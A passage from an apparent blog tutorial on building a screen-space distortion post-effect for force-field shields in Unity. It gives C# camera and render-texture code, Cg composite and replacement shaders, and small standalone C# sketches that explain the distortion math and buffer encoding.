<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="n">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The SetTargetBuffers call is how we are going to work around the targetTexture weirdness. If you attach this component to your main camera object, your game view should look exactly the same as it did before we wrote this script, but behind the scenes, we have ourselves a nice, easy to work with RenderTexture for our game. Which is perfect!</p>
<p>Now all we need to do is distort that texture. If you look at <a href="http://docs.unity3d.com/ScriptReference/Graphics.Blit.html">the docs</a> for Graphics.Blit, you’ll find that you can specify a material. If you think of Graphics.Blit like a full screen quad, then the material you specify here is just the material on that Quad. Blit automatically sets the _MainTex property of this material to your source render texture. Since all we need to do is modify the texture coordinates that we map to the screen, we can get by with a pretty simple material. The example above uses the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">sin</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span> <span class="o">*</span> <span class="mi">100</span><span class="p">)</span><span class="o">*</span><span class="mf">0.01</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>I’m going to call this shader our “composite” shader, since it’s what we’re going to use to combine data about how to render the distortion effect with our regular camera view.</p>
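<p>To get a feel for what the two magic numbers in that fragment shader do, here’s a small standalone C# sketch (plain console code, not part of the Unity project) that mirrors the shader’s offset math. The 1920 pixel width and the sample rows are assumptions picked purely for illustration.</p>
<figure class="highlight"><pre><code class="language-csharp" data-lang="csharp">using System;

static class WaveDistortion
{
    // Mirrors the shader's offset: u' = u + sin(v * frequency) * amplitude.
    static double DistortU(double u, double v, double frequency = 100.0, double amplitude = 0.01)
    {
        return u + Math.Sin(v * frequency) * amplitude;
    }

    static void Main()
    {
        const int screenWidth = 1920;   // assumed resolution, for illustration only
        const double amplitude = 0.01;  // same constant as the shader
        const double frequency = 100.0; // same constant as the shader

        // The largest horizontal shift, in pixels, is amplitude * width.
        Console.WriteLine("Max shift: " + amplitude * screenWidth + " px");

        // One full wave spans 2*pi / frequency in v, so this many waves fit on screen.
        Console.WriteLine("Waves down the screen: " + frequency / (2.0 * Math.PI));

        // Sample a few rows: no offset, near the positive peak, near the negative peak.
        foreach (double v in new[] { 0.0, 0.0157, 0.0471 })
            Console.WriteLine("v=" + v + " gives u=" + DistortU(0.5, v));
    }
}</code></pre></figure>
<p>At that assumed width the wobble tops out at a little over 19 pixels, and roughly 16 waves fit down the screen. Raising the 0.01 makes the wobble wider; raising the 100 packs the waves closer together.</p>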
<p>Now you just need to modify the earlier C# code to use this new shader, and you should see exactly the same type of effect across your screen.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Voila! We now officially have our post effect working!</p>
<h2>An Actually Useful Implementation</h2>
<p>Now that we have the basics down, it’s time for us to decide how we should go about modifying our screen UVs. Unless you’re going for some sort of drug trip / dream sequence effect, performing arithmetic on the UVs alone is likely not going to cut it. Today we’re going to create a secondary screen buffer (the “shield” buffer), and draw our shield(s) into it using a replacement shader. We’ll then use the contents of that buffer to deform our screen UVs.</p>
<p>But before we get to the replacement shader, let’s just render our shield as is into the secondary buffer (to make sure the buffer is working at all).</p>
<p>We’re going to be modifying our C# script again. We need to create a second render texture for the shield, but this one doesn’t need to be at full screen resolution: we aren’t going to use it for colours in the framebuffer, and drawing into a smaller buffer is much lighter on the GPU. Then we need to set up a camera for it, and get that camera rendering into this buffer. Here’s what that looks like:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">CopyFrom</span><span class="p">(</span><span class="n">mainCam</span><span class="p">);</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">backgroundColor</span> <span class="o">=</span> <span class="n">Color</span><span class="p">.</span><span class="n">grey</span><span class="p">;</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">);</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">targetTexture</span> <span class="o">=</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">Render</span> <span class="p">();</span>
<span class="n">effectMaterial</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="s">"_DistortionTex"</span><span class="p">,</span> <span class="n">shieldRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
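<p>As a rough sanity check on why the quarter-size shield buffer is cheaper, here’s a standalone C# sketch of the pixel counts involved. The 1920x1080 screen size is an assumption for illustration; the script above uses whatever Screen.width and Screen.height report.</p>
<figure class="highlight"><pre><code class="language-csharp" data-lang="csharp">using System;

static class BufferCost
{
    static void Main()
    {
        // Assumed screen size, standing in for Screen.width / Screen.height.
        int width = 1920, height = 1080;

        // screenRT is full resolution; shieldRT divides each dimension by 4.
        long fullPixels = (long)width * height;
        long quarterPixels = (long)(width / 4) * (height / 4);

        Console.WriteLine("screenRT pixels: " + fullPixels);
        Console.WriteLine("shieldRT pixels: " + quarterPixels);
        Console.WriteLine("ratio: " + (double)fullPixels / quarterPixels);
    }
}</code></pre></figure>
<p>Dividing both dimensions by 4 leaves one sixteenth of the pixels to fill, which is where the saving comes from. The trade-off is lower resolution in the distortion data, which shows up later as slightly jagged shield edges.</p>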
<p>If you run this now (and make shieldRT public so you can inspect it), you’ll be able to see that we are successfully drawing into our shield buffer. Our effect shader isn’t doing anything useful with that data yet, so let’s look at that next. For this initial step, let’s modify the composite shader to simply subtract the G and B values of the distortion texture from the screen UVs:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">sampler2D</span> <span class="n">_DistortionTex</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">distort</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DistortionTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">-</span> <span class="p">(</span><span class="n">distort</span><span class="p">.</span><span class="n">gb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)));</span>
<span class="k">return</span> <span class="n">tex</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you hit run now, this is what the sample scene should look like:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/checkerdistort.gif" />
<br />
<br />
</div>
<p>Not exactly what we’re after - but at least it’s interesting!</p>
<p>Now that we’ve proven that the secondary buffer is working, it’s time to think about how we want our shield to look. When I think of a force field, I think of it as energy repelling things away from whatever is inside the shield. So I think I’d like my shield to communicate that visually. Let’s shift the UVs on the edge of the shield away from the center of the circle.</p>
<p>To do this, we’re going to use a replacement shader, which is going to swap the shader on our shield bubbles when they’re rendered by our distortion camera. This will let us write the data we need to our secondary buffer without changing how the bubble looks in game.</p>
<p>Let’s use the following as a starting point:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
#pragma fragment frag
#include "ShieldEffect.cginc"
</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">oPos</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wPos</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wNorm</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">objPos</span> <span class="o">:</span> <span class="n">TEXCOORD3</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">zeroPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">float4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">1.0</span><span class="p">));</span>
<span class="n">o</span><span class="p">.</span><span class="n">wPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">mul</span><span class="p">(</span><span class="n">fixed4</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">),</span> <span class="n">_World2Object</span><span class="p">).</span><span class="n">xyz</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">objPos</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">.</span><span class="n">xyz</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">oPos</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">pos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">zeroPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">fixed4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">x</span><span class="p">,</span><span class="mf">0.0</span><span class="p">,</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">intensity</span> <span class="o">=</span> <span class="n">CalcShieldIntensity16</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">objPos</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">viewdir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">_WorldSpaceCameraPos</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">wPos</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">ang</span> <span class="o">=</span> <span class="mf">1.0</span><span class="o">-</span> <span class="n">dot</span><span class="p">(</span><span class="n">viewdir</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">wNorm</span><span class="p">)</span> <span class="o">+</span> <span class="n">intensity</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="n">tex</span> <span class="o">*</span> <span class="n">ang</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span></code></pre></figure>
<p>Before we go about plumbing this into our game, let’s talk about what’s going on here. First, since we want our effect to look the same no matter what angle we’re viewing from, it simplifies a lot of things if we work in screen space when generating the colours that we write to the buffer. What we want is for those colours to represent each point’s direction from the center of the shield. To get that, we transform the object’s origin (the zeroPos variable) with the same matrix we use for the vertex, and then subtract that point from the transformed vertex position. This gives us a nice direction vector to work with.</p>
<p>In the fragment shader, we turn this direction vector into a colour, and we use a rim light calculation to attenuate the colours towards the center of the shield (since the normals for the center of the screen space sphere will always point towards the camera). Then we add 0.5 to everything, so that we can use this buffer to distort things in both directions in U,V space (since you can’t write a negative colour into a buffer). This means that any pixel in the buffer which is written out as 128,128,128 will do nothing, but values above and below are valid.</p>
<p>Finally, we add the intensity calculation to our fragment so that our impacts can distort more along their edges. This obviously won’t be 100% accurate because the direction of the distortion isn’t really being taken into account, but it creates a good looking effect anyway. You could spend more time making sure that the impact bubbles distort in a consistent way out from their center, but for brevity’s sake I’m not going to in this post.</p>
<p>This is going to give us a shield buffer that looks something like this (assuming 2 shields on screen):</p>
<div align="center">
<img src="/images/post_images/2016-1-15/shield_buffer.png" />
<br />
<br />
</div>
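<p>The 0.5 bias described above is easier to trust once you’ve seen it round-trip. Here’s a standalone C# sketch of the idea. It assumes an 8-bit-per-channel buffer (which is what RenderTextureFormat.Default usually gives you, though that is platform dependent), and the Encode and Decode helpers are names made up for this illustration, not anything from the project.</p>
<figure class="highlight"><pre><code class="language-csharp" data-lang="csharp">using System;

static class DirectionEncoding
{
    // Replacement-shader side: bias a signed component so it fits the [0, 1]
    // range a colour channel can hold, then quantise it to 8 bits.
    static byte Encode(double signedValue)
    {
        double biased = Math.Min(1.0, Math.Max(0.0, signedValue + 0.5));
        return (byte)Math.Round(biased * 255.0);
    }

    // Composite-shader side: undo the bias to recover a signed offset.
    static double Decode(byte channel)
    {
        return channel / 255.0 - 0.5;
    }

    static void Main()
    {
        // The last sample is deliberately out of range to show the clamping.
        foreach (double value in new[] { -0.5, -0.25, 0.0, 0.25, 0.8 })
        {
            byte stored = Encode(value);
            Console.WriteLine(value + " stored as " + stored + ", read back as " + Decode(stored));
        }
    }
}</code></pre></figure>
<p>Two things fall out of this under those assumptions. A value of zero is stored as 128, which reads back as a very small offset rather than exactly zero, and anything outside the -0.5 to 0.5 range saturates, so very strong directions all read back as the same maximum offset.</p>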
<p>Now all we need to do is get the replacement shader working. Just get the shader into your script the same way we loaded in the Composite shader, and make this really simple one-line change to the Render call in OnPostRender:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">distortCam</span><span class="p">.</span><span class="n">RenderWithShader</span><span class="p">(</span><span class="n">shieldReplacementShader</span><span class="p">,</span> <span class="n">null</span><span class="p">);</span></code></pre></figure>
<p>And with that, we should have the following!</p>
<div align="center">
<img src="/images/post_images/2016-1-15/second_distort.gif" />
<br />
<br />
</div>
<p>Note that you may find that the effect is too intense even with the replacement shader (this is extremely noticeable if you’re working with the scene I gave you at the beginning of the article). In that case you may want to tone down the intensity of the effect by adding a multiplication into the composite shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="p">(</span><span class="n">distort</span><span class="p">.</span><span class="n">gb</span> <span class="o">-</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">*</span> <span class="mf">0.1</span> <span class="p">));</span></code></pre></figure>
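<p>If you’d rather tune that 0.1 from the inspector than recompile the shader every time, something along these lines could work. This is only a sketch: the DistortionStrength component and the _DistortionStrength property are hypothetical names, and it assumes you’ve changed the composite shader to declare a matching float and multiply by it instead of the hard-coded 0.1.</p>
<figure class="highlight"><pre><code class="language-csharp" data-lang="csharp">using UnityEngine;

// Hypothetical helper, not part of the original project.
// Assumes the composite shader declares `float _DistortionStrength;`
// and uses it in place of the hard-coded 0.1 multiplier.
public class DistortionStrength : MonoBehaviour
{
    // 0 disables the distortion entirely; 0.1 matches the hard-coded value.
    [Range(0f, 1f)]
    public float strength = 0.1f;

    // Must be the same material instance that the effect script passes to Graphics.Blit.
    public Material effectMaterial;

    void Update()
    {
        // Push the current value to the material every frame so inspector tweaks show up live.
        if (effectMaterial != null)
            effectMaterial.SetFloat("_DistortionStrength", strength);
    }
}</code></pre></figure>
<p>Since the effect script above creates its material privately in Awake, you’d need to expose that material (or fold the SetFloat call into the effect script itself) for this to affect anything.</p>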
<p>If you’re following along at home, your sample scene should look like this if you grab your shield and move it around:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/checkertranslate.gif" />
<br />
<br />
</div>
<p>You may also notice that the edges of your shield bubble are now a little bit jagged. This is because we’re rendering the shield effect to a smaller buffer. You can alleviate this by increasing the size of the shield RenderTexture (which is EXTREMELY expensive), or by doing some sort of blur operation on your shield buffer (probably less expensive). However, we’re not going to worry about it today, because by the end of the article we’re going to have an approach that hides the jaggedness.</p>
<p>This is great and all, but now our shield looks all weird since we’re distorting the UVs that it’s being drawn with too. I’d like to preserve the nice plasma texture on the shield, so I’m going to move the actual rendering of the shield to a different camera, and make sure the camera that we’re distorting the UVs on doesn’t see objects on the shield layer. This is really easy to do, but will leave us with a different problem. We’ll get to that in a second.</p>
<p>First, let’s modify our C# effect script to create this new camera for us:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">shieldCam</span><span class="p">;</span>
<span class="n">Shader</span> <span class="n">shieldReplacementShader</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="o">/</span><span class="mi">4</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">shieldRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
<span class="n">shieldReplacementShader</span> <span class="o">=</span> <span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Replacement"</span><span class="p">);</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">&=</span> <span class="o">~</span><span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="n">NameToLayer</span><span class="p">(</span><span class="s">"Shield"</span><span class="p">));</span>
<span class="n">distortCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"DistortionCam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">distortCam</span><span class="p">.</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">shieldCam</span> <span class="o">=</span> <span class="k">new</span> <span class="n">GameObject</span><span class="p">(</span><span class="s">"Shield Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="o">=</span> <span class="n">distortCam</span><span class="p">.</span><span class="n">cullingMask</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="o">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">depth</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">depth</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">shieldCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="o">=</span> <span class="n">mainCam</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
